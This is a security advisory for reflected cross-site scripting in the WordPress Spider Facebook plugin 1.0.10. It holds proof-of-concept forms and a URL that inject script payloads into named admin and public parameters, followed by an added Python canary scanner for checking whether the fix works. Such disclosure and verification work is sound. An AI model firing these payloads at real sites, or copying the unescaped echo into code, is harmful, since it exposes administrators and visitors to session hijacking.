WordPress Spider Facebook 1.0.10 Cross Site Scripting
Posted on 10 February 2015
Title: WordPress 'Spider Facebook' plugin - XSS
Version: 1.0.10
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/spider-facebook/
Contacted WordPress: 2015/01/26

==========================================================
## Description:
==========================================================

Spider Facebook is a WordPress integration tool for Facebook. It includes all the available Facebook social plugins and widgets to be added to your web

==========================================================
## XSS:
==========================================================

Several request parameters are reflected into the response unsanitized, so reflected cross-site scripting is possible. The forms below post to plugin pages under wp-admin, so the browser that submits them must be logged in as an administrator; the final URL needs no login at all. In every form the payload is "/><script>alert(n)</script>: it closes the double-quoted attribute the value is echoed into and injects a script element (the value is single-quoted in the form so the browser submits the leading double quote intact).

PoC: Log in as an administrator and submit one of the following forms:

<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage">
  <input type="text" name="asc_or_desc" value='"/><script>alert(1)</script>'><br />
  <input type="text" name="order_by" value='"/><script>alert(2)</script>'><br />
  <input type="text" name="page_number" value='"/><script>alert(3)</script>'><br />
  <input type="text" name="serch_or_not" value='"/><script>alert(4)</script>'><br />
  <input type="submit">
</form>

<form method="POST" action="http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&">
  <input type="text" name="search_events_by_title" value='"/><script>alert(1)</script>'><br />
  <input type="text" name="page_number" value='"/><script>alert(2)</script>'><br />
  <input type="text" name="serch_or_not" value='"/><script>alert(3)</script>'><br />
  <input type="text" name="asc_or_desc" value='"/><script>alert(5)</script>'><br />
  <input type="text" name="order_by" value='"/><script>alert(6)</script>'><br />
  <input type="submit">
</form>

Also works with this target URL: http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook&

<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage">
  <input type="text" name="search_events_by_title" value='"/><script>alert(1)</script>'><br />
  <input type="text" name="serch_or_not" value="search" READONLY><br />
  <input type="submit">
</form>

Also works with http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook& and http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&

You can also just visit the following URL (no login required):

http://[URL]/?task=registration&g_red=1&type=auto&appid=%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E

The URL-decoded appid value is "></iframe><script>alert(1)</script>, which closes the quoted attribute and the enclosing iframe before injecting the script.

==========================================================
## Solution
==========================================================

Update to version 1.0.11
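A practitioner verifying this advisory, or confirming that the 1.0.11 update actually fixed it, wants a repeatable check rather than alert boxes. The script below is an added example and is not part of the advisory or of the plugin: it takes the endpoints and parameter names listed above, sends a benign canary through each one, and classifies the response as echoed raw (exploitable), HTML-escaped (fixed) or absent. The transport is injected so the same logic runs offline against the constructed fake responses included here; the fake markup is invented for the demonstration and is not the plugin's real output, and http://example.test/ is a placeholder for the target.

```python
import html
from urllib.parse import parse_qs, urlencode, urljoin, urlparse

# Canary payload: breaks out of a double-quoted attribute exactly like the
# advisory's "/><script>alert(n)</script> payloads, but carries a unique tag
# so its echo cannot be confused with anything the page already contains.
CANARY = '"/><xsscanary>'

# Parameters the advisory reports as reflected, keyed by the endpoint that
# reflects them (paths are relative to the WordPress root).
POST_VECTORS = {
    "wp-admin/admin.php?page=Spider_Facebook_manage": (
        "asc_or_desc", "order_by", "page_number", "serch_or_not",
        "search_events_by_title",
    ),
    "wp-admin/admin-ajax.php?action=selectpagesforfacebook&": (
        "search_events_by_title", "page_number", "serch_or_not",
        "asc_or_desc", "order_by",
    ),
    "wp-admin/admin-ajax.php?action=selectpostsforfacebook&": (
        "search_events_by_title", "page_number", "serch_or_not",
        "asc_or_desc", "order_by",
    ),
}
# The unauthenticated vector: GET / with task=registration, appid reflected.
GET_VECTOR = ("", {"task": "registration", "g_red": "1", "type": "auto"}, "appid")


def classify(body, canary=CANARY):
    """Report how the server echoed the canary.

    'raw'      quote and tag survive verbatim, so the payload would execute
    'escaped'  echoed but HTML-encoded (what esc_attr()/htmlspecialchars() do)
    'absent'   not reflected in this response at all
    """
    if canary in body:
        return "raw"
    if (html.escape(canary, quote=True) in body
            or html.escape(canary, quote=False) in body):
        return "escaped"
    return "absent"


def scan(fetch, base_url):
    """Probe every vector through fetch(method, url, data) -> response body.

    Returns {(method, path, param): verdict}. The transport is injected so
    the same logic runs against the constructed fakes below or, on a target
    you are authorised to test, a requests.Session carrying an
    administrator cookie for the wp-admin endpoints.
    """
    results = {}
    path, fixed, param = GET_VECTOR
    url = urljoin(base_url, path) + "?" + urlencode({**fixed, param: CANARY})
    results[("GET", path, param)] = classify(fetch("GET", url, None))
    for path, params in POST_VECTORS.items():
        url = urljoin(base_url, path)
        for param in params:
            data = {p: "1" for p in params}   # benign filler for the rest
            data[param] = CANARY              # one canary per request
            results[("POST", path, param)] = classify(fetch("POST", url, data))
    return results


def fake_site(escape_values):
    """Constructed stand-in for a target (invented markup, not the plugin's).

    It renders request parameters back into a page either verbatim, as the
    advisory says 1.0.10 does, or HTML-escaped, as a fixed build would.
    """
    enc = (lambda v: html.escape(v, quote=True)) if escape_values else (lambda v: v)

    def fetch(method, url, data):
        if method == "GET":
            query = parse_qs(urlparse(url).query)
            appid = query.get("appid", [""])[0]
            return '<iframe src="?appid=%s"></iframe>' % enc(appid)
        return "".join('<input name="%s" value="%s">' % (k, enc(v))
                       for k, v in data.items())

    return fetch


if __name__ == "__main__":
    # Placeholder base URL; on a real engagement pass a live fetch instead.
    for label, site in (("1.0.10-like", fake_site(False)), ("fixed", fake_site(True))):
        for key, verdict in scan(site, "http://example.test/").items():
            print(label, *key, verdict)
```

Sending a canary instead of a script tag keeps the check harmless and makes the escaped case easy to recognise: a patched build returns `&quot;/&gt;&lt;xsscanary&gt;` where the vulnerable one returns the bytes unchanged. On a live target the POST vectors only reach the reflecting code when the session is an administrator's, so an 'absent' verdict from an unauthenticated session says nothing about the fix.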
